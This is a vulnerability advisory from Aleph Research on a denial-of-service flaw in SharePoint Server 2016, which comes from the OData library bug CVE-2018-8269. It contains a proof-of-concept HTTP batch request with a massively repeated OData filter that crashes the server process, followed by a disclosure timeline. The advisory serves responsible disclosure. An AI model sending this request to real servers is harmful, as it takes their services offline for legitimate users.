DOS Vulnerability in SharePoint 2016 Server

Aleph Research Advisory





  1. SharePoint Server 2016

Technical Details

A vulnerability in Microsoft SharePoint Server could allow a remote attacker to make the server unavailable.

The vulnerability is a result of the dependency SharePoint has in Microsoft.Data.OData library which was vulnerable to remote DOS (See CVE-2018-8269).

The exploit is done by sending a crafted request that contains an OData filter that triggers the vulnerability in Microsoft.Data.OData library. Sending such request, will terminate the process that runs the server.

By default, SharePoint server is configured to recover a terminated process, but it will do so only 10 times. If more than 10 malicious requests are sent in 5 minutes interval, the server will not recover and will be down until it is manually restarted.

Proof Of Concept

Following is a sample HTTP request that can be used for such attack.

POST /_api/$batch HTTP/1.1
Host: test-server
X-RequestDigest: XXXXX
Authorization: Basic XXXXX
content-type: multipart/mixed; boundary=batch_312b6c52-0483-45b9-9133-91be5d91edb9
Content-Length: 49012

Content-type: application/http
Content-Transfer-Encoding: binary

GET http://test-server/_api/web/lists?$filter=true+or+true+or+true+ … (~ 6100 repetitions) HTTP/1.1
accept: application/json;odata.metadata=minimal



  • 22-Oct-18
    : Public disclosure.
  • 15-Oct-18
    : Deadline.
  • 10-Oct-18
    : 14-day Deadline Extension Offered (I don't have an ETA for when their investigation will complete. I will contact you early next week to provide an update.).
  • 18-Jul-18
    : Reported (Microsoft Security Response Center).



External References